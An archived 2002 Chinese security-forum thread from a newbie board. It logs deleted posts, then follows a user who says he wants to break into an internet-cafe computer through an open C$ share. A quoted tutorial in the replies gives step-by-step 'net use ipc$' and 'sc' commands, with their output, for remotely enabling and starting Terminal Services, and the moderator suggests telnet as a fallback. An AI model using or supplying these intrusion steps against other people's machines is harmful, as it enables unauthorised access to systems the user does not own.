论坛: 菜鸟乐园 标题: 2002年4月26日删贴记录 复制本贴地址    
作者: group [group]    论坛用户   登录
1、标题: 是否现在升请不了QQ的密码保护??? 返回 
 
  作者: 韦玄阳 [wyh1986tc]    论坛用户 回复   发送   删除  
现在申请密码保护是  要添附加码    我添了 n次都不成功        

2、标题: 怎样知道QQ上好友的IP 返回 
 
  作者: 韦玄阳 [wyh1986tc]    论坛用户 回复   发送   删除  
怎样知道QQ上好友的IP呀    个位大虾     

 3、标题: 关于远程安装终端服务的问题。 返回 
 
  作者: 风一样的男子 [ma2751_cn]    论坛用户 回复   发送   删除  
现发现有139完全共享漏洞的主机,操作系统为WIN2K,经查为网吧主机。只有C盘完全共享,不可进入控制面版和其它盘符,扫描扫不到弱口令,终端服务(3389)没开,我想给它安装终端服务,请问怎么样能给它安装上?

 4、标题: 他是用wingate代理上网,可以入侵代理的主机,怎么进他的机器呢? 返回 
 
  作者: mengxi88 [mengxi88]    论坛用户 回复   发送   删除  
谢谢各位!

 
5、标题: IE中莫名其妙的链接 返回 
 
  作者: 风中的云 [jackcheng]    论坛用户 回复   发送   删除  
 有台机器上了一个网站以后,打开IE就自动链接到该网站,在Internet选项下修改后不起作用.请问我该咋去掉这个链接

 
6、标题: 我是初学者 返回 
 
  作者: louyunfeng [louyunfeng]    论坛用户 回复   发送   删除  
请大家多多照顾!谢谢!

 
7、标题: qq被盗的问题 返回 
 
  作者: 心恋 [zlc0926]    论坛用户 回复   发送   删除  
我的QQ今天被别人盗了,有什么软件可以将的我的QQ归还给我。

他们是用什么软件来盗到密码的?????????

地主 发表时间: 04/26 12:32

回复: group [group]   论坛用户   登录
标题: 后缀名为dll的文件怎样打开? 返回 
 
  作者: wjhwjh5 [wjhwjh5]    论坛用户 回复   发送   删除  
后缀名为dll的文件怎样打开?

 

B1层 发表时间: 04/26 22:58

回复: ma2751_cn [ma2751_cn]      登录
晕倒`~~~晓澜斑竹,呵呵,菜鸟乐园不是给菜鸟学习的吗?为什么题个问题还要被删除呢?我是找了好久也没找到答案才发到上面来的。我只是想找到入侵的方案,怎么删除了呢??能说明理由吗?
老大曾写道:
在通过电邮、新闻组或者聊天室提出技术问题前,检查你有没有做到: 
1. 通读手册,试着自己找答案。 
2. 在FAQ里找答案(一份维护得好的FAQ可以包罗万象:)。 
3. 在网上搜索(个人推荐google~~~)。 
4. 向你身边精于此道的朋友打听。 
上面的我都做过了,但还是找不到答案,发到20CN来要被删除,如果就这样把问题这样搁着不去想了,那就不会有进步了,不是吗?
那么是问题太菜了,没有想到提问的艺术??
记得有一位老大还说过:
小学的时候问老师1*5=?老师会回答
但大学的时候问这个问题就有人会笑你。
但有想过吗?我们这些菜鸟不就等于读小学吗?为什么要删除呢?当然,也许你们这些老鸟觉得太菜了,因为你们心中已经有了答案。但这也不是一个从菜鸟走到老鸟所必经的路吗?我想你们以前都走过想我这样的路吧~~~~
说完了,还请各位给个理由好吗?


B2层 发表时间: 04/28 07:50

回复: group [group]   论坛用户   登录
很明显你没有仔细查找,我在这个论坛发过一篇解决这个问题的文章,现在还被回复到前面了,没有删错

B3层 发表时间: 04/28 21:49

回复: ma2751_cn [ma2751_cn]      登录
也许吧~~~但有些帖子已经被压在后面了,而且还是很后面,当然找不到了,不是吗?我再仔细找找看////

B4层 发表时间: 04/28 22:11

回复: ma2751_cn [ma2751_cn]      登录
回复人:给我理由 回复时间:2002-3-18 15:28:18 
.abu说过的


------------------------------------------------------------------------------------------
C:\>net use \\xxx.xxx.xxx.xxx\ipc$ "password" /user:"name" 

第一步,检查对方是否真的禁用了Terminal server 

C:\>sc \\xxx.xxx.xxx.xxx qc termservice 
[SC] GetServiceConfig SUCCESS 

SERVICE_NAME: termservice 
TYPE : 10 WIN32_OWN_PROCESS 
START_TYPE : 4 DISABLED 
ERROR_CONTROL : 1 NORMAL 
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe 
LOAD_ORDER_GROUP : 
TAG : 0 
DISPLAY_NAME : Terminal Services 
DEPENDENCIES : 
SERVICE_START_NAME : LocalSystem 

仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。 

第二步,更改对方终端服务的启动模式 

C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto 

[SC] ChangeServiceConfig SUCCESS 

好了,现在我们已经把对方终端服务的启动模式修改成自动了。 

第三步,再检查一便对方终端服务的启动模式(.abu.:呵呵,习惯问题) 

C:\>sc \\TEST qc termservice 
[SC] GetServiceConfig SUCCESS 

SERVICE_NAME: termservice 
TYPE : 10 WIN32_OWN_PROCESS 
START_TYPE : 2 AUTO_START 
ERROR_CONTROL : 1 NORMAL 
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe 
LOAD_ORDER_GROUP : 
TAG : 0 
DISPLAY_NAME : Terminal Services 
DEPENDENCIES : 
SERVICE_START_NAME : LocalSystem 

仔细看 START_TYPE一项,显示对方该服务的启动模式为“AUTO_START”也就是“自动”。 

OK 
第四步,启动对方的终端服务 

C:\>sc \\xxx.xxx.xxx.xxx start termservice 

SERVICE_NAME: termservice 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 2 START_PENDING 
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) 
WIN32_EXIT_CODE : 0 (0x0) 
SERVICE_EXIT_CODE : 0 (0x0) 
CHECKPOINT : 0x1 
WAIT_HINT : 0x7530 

C:\>sc \\xxx.xxx.xxx.xxx query termservice 

SERVICE_NAME: termservice 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 4 RUNNING 
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) 
WIN32_EXIT_CODE : 0 (0x0) 
SERVICE_EXIT_CODE : 0 (0x0) 
CHECKPOINT : 0x0 
WAIT_HINT : 0x0 


到这里,对方的终端服务就被你启动了。命令行方式下哦。呵呵 
---------------------------------------------------------------------------


这是一篇很好的解决终端服务termservice在"管理工具">>>"服务"中被禁用的好办法.
但是,这里有个前提,就是终端服务组件必须已经正确安装,
如何判断呢?我在另一篇文章里已经讲了.远程开启3389终端服务(菜鸟篇)

如果终端服务组件没有安装
还要以"用Sc看到status是stopped的,使用sc将其启动变为auto"
就认为服务已经启动,那就错了!
新手会经常出现这个问题,我也经常在论坛看到此类帖子.

如果没有安装服务组件,一样可以
sc config termservice start= auto
sc start termservice

再看:
sc query termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING //没有runing,而是正在启动状态(未决)
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0 

在这时,服务是不可能真正启动的,因为终端服务组件并没有安装,
虽然你用SC看到了服务状态,但你是肯定连不上的.
这样而且会在重起时出现服务错误,不信,你可以在他重起后,远程连到计算机管理,
查看"事件查看器"===>"系统",你会发现 "terminal services 服务在启动时暂停"的描述

所以,SC远程启动服务在使用时,要首先判断终端服务组件已经安装,而且确实是在"服务"中
被禁用的,才可以成功运用此方法. 

找到了,是这个吗???呵呵,但你没有把我的问题看清楚,网吧的主机什么服务都没有呀,只有共享,SC远程启动服务????它没有呀....


B5层 发表时间: 04/28 22:21

回复: group [group]   论坛用户   登录
无话可说,就象问“一台机器补了unicode漏洞,我怎么通过unicode漏洞进去”一样没人会回答

B6层 发表时间: 04/29 11:26

回复: ma2751_cn [ma2751_cn]      登录
那么就不会有其它的方法了吗???
139共享漏洞耶,而且是C盘完全共享的。这个漏洞他没补呀,呵呵,网吧的主机关闭了139端口还要来有什么用?

B7层 发表时间: 04/29 18:32

回复: group [group]   论坛用户   登录
网吧的机子可以对外关闭139端口,对内开放
开不了terminal就用telnet吧,一样好用的


B8层 发表时间: 04/29 23:59

回复: ma2751_cn [ma2751_cn]      登录
谢谢,我去试试,有问题还先请多多指教。呵呵。
还有你真的误解我了,你说我没有认真搜索,我不是说扫不到弱口令了吗?怎么用IPC连接呀???应该是不能的吧,又不能空连接。
SC远程启动服务在使用,也没用是吗???
呵呵,


[此贴被 风一样的男子(ma2751_cn) 在 4月30日19时39分 编辑过]

B9层 发表时间: 4/30 19:13

回复: wafire [erifaw]   论坛用户   登录
设个回收站吧,


B10层 发表时间: 04/30 20:47

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号